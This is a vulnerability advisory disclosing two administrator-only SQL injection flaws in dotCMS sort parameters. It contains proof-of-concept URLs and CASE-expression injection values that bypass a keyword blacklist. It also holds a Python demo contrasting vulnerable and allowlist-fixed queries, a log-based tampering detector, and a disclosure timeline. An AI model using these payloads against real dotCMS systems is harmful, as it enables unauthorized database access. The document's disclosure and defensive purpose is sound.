Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: dotCMS (http://dotcms.com/)
Vulnerability: SQL injection
Vulnerable version: before 4.1.1. Theoretically would be fixed in 3.7.2 (not released yet)
CVE: CVE-2016-10007, CVE-2016-10008
# Multiple SQL injections in dotCMS framework.
I had already reported 8 SQL injection vulnerabilities to dotCMS and I
was curious as to how they fixed them.
While checking the fixes I found 2 new vulnerabilities, but for those I had
to bypass the blacklist defence.
## CVE-2016-10007 - "Marketing > Forms" page, _EXT_FORM_HANDLER_orderBy parameter
An SQL injection vulnerability in the "Marketing > Forms" screen in
dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_FORM_HANDLER_orderBy parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click
on some column title in the resultset table):
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc
Proof-of-Concept values for parameter _EXT_FORM_HANDLER_orderBy.
Precondition for this example: there must be at least 2 different rows
in the resultset, and ordering by the name field and by the description
field must give different orderings (if they don't, use some other field names).
-- boolean true - output is ordered by name field
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end
-- boolean false - output is ordered by description field
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end
## CVE-2016-10008 - "Content Types > Content Types" page, _EXT_STRUCTURE_direction parameter
An SQL injection vulnerability in the "Content Types > Content Types"
screen in dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_STRUCTURE_direction parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content
Types", click on some column title in the resultset table):
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi
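Both issues above share one root cause: a sort column (orderBy) and a sort direction taken from the request are placed into the ORDER BY clause, and a keyword blacklist is relied on to filter them, which a CASE expression slips past. The example below is added here and is not dotCMS code; it reconstructs that pattern against a constructed in-memory SQLite table, shows the page's two orderBy values changing the row order through the vulnerable path, and beside it the allowlist-based fix that rejects anything except a known column name and "asc"/"desc". It also includes a small access-log check over constructed request paths that flags the four sort parameters named on this page when their values fall outside that allowlist. The table, column set and log lines are assumptions for the demo.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows standing in for a form-handler result set:
# ordering by "name" and ordering by "description" give different orders.
SAMPLE_ROWS = [
    ("b-form", "a-desc"),
    ("a-form", "b-desc"),
]

# Allowlists: the only identifiers that may ever reach the ORDER BY clause.
# Column names are assumed for this demo (velocity_var_name is taken from
# the PoC URL on this page).
ALLOWED_ORDER_COLUMNS = {"name", "description", "velocity_var_name"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def _connect():
    """Build a throwaway in-memory table with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE form_handler (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO form_handler VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(order_by, direction):
    """Flawed pattern (hypothetical reconstruction, not dotCMS code):
    request-controlled sort fields are concatenated straight into SQL.
    A keyword blacklist on order_by would not help, because a plain CASE
    expression contains no quotes, comments or statement separators."""
    conn = _connect()
    sql = f"SELECT name FROM form_handler ORDER BY {order_by} {direction}"
    return [row[0] for row in conn.execute(sql)]


def safe_query(order_by, direction):
    """Hardened pattern: validate both identifiers against an allowlist
    before they are used. Identifiers cannot be bound as parameters, so
    allowlisting is the correct control here, not escaping or a blacklist."""
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"rejected orderBy value: {order_by!r}")
    if direction.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected direction value: {direction!r}")
    conn = _connect()
    sql = f"SELECT name FROM form_handler ORDER BY {order_by} {direction}"
    return [row[0] for row in conn.execute(sql)]


# Sort parameters named in this advisory, mapped to what they may contain.
SORT_PARAMS = {
    "_EXT_FORM_HANDLER_orderBy": ALLOWED_ORDER_COLUMNS,
    "_EXT_FORM_HANDLER_direction": ALLOWED_DIRECTIONS,
    "_EXT_STRUCTURE_orderBy": ALLOWED_ORDER_COLUMNS,
    "_EXT_STRUCTURE_direction": ALLOWED_DIRECTIONS,
}

# Constructed request paths as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/c/portal/layout?p_p_id=EXT_FORM_HANDLER&_EXT_FORM_HANDLER_orderBy=name"
    "&_EXT_FORM_HANDLER_direction=asc",
    "/c/portal/layout?p_p_id=EXT_FORM_HANDLER&_EXT_FORM_HANDLER_orderBy="
    "case+when+1%3D1+then+name+else+description+end&_EXT_FORM_HANDLER_direction=asc",
    "/c/portal/layout?p_p_id=EXT_STRUCTURE&_EXT_STRUCTURE_orderBy=velocity_var_name"
    "&_EXT_STRUCTURE_direction=SQLi",
]


def flag_sort_tampering(request_paths):
    """Return (parameter, value) pairs for sort parameters whose value is not
    in the allowlist. A cheap log-side detection for probes against these
    parameters; legitimate UI clicks only ever send known column names."""
    hits = []
    for path in request_paths:
        query = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for param, allowed in SORT_PARAMS.items():
            for value in query.get(param, []):
                if value.lower() not in allowed:
                    hits.append((param, value))
    return hits


if __name__ == "__main__":
    print(vulnerable_query("case when 1=1 then name else description end", "asc"))
    print(vulnerable_query("case when 1=0 then name else description end", "asc"))
    print(safe_query("name", "asc"))
    print(flag_sort_tampering(SAMPLE_REQUESTS))
```

The vulnerable function returns the rows in name order for the "1=1" value and in description order for the "1=0" value, which is exactly the observable difference the PoC above relies on; the hardened function raises on both values and on the literal "SQLi" direction, while still serving the normal column names the UI sends.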
# Vulnerability Disclosure Timeline
2016-10-24 | me > dotCMS | SQLi Poc
2016-10-25 | dotCMS > me | Thanks for PoC
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for
reported issues.
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release
2016-12-19 | me > dotCMS | agreed with low priority (requires an
authenticated user with administrator privileges)
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]
2017-03-06 | dotCMS > me | No. Probably will not be addressed until
the project to refactor our admin interface is completed.
2017-06-16 | dotCMS | dotCMS version 4.1.1 release
2017-07-18 | me > dotCMS | As I need to publish the CVEs at some point,
what is the status?
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be
possible to wait 3 to 4 weeks so we can release 3.7.2?
2017-10-10 | me > dotCMS | "3 to 4 weeks" passed, how is it going with 3.7.2?
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for
your email! It prompted me to push the developer to finish getting
this release out the door. I will email you next week with an update."
This "next week" never arrived ;)
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu
# Related fixes and releases
https://dotcms.com/docs/latest/change-log#release-4.1.1
# More detailed description (including some code review and the blacklist bypass)
Available in the blog:
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com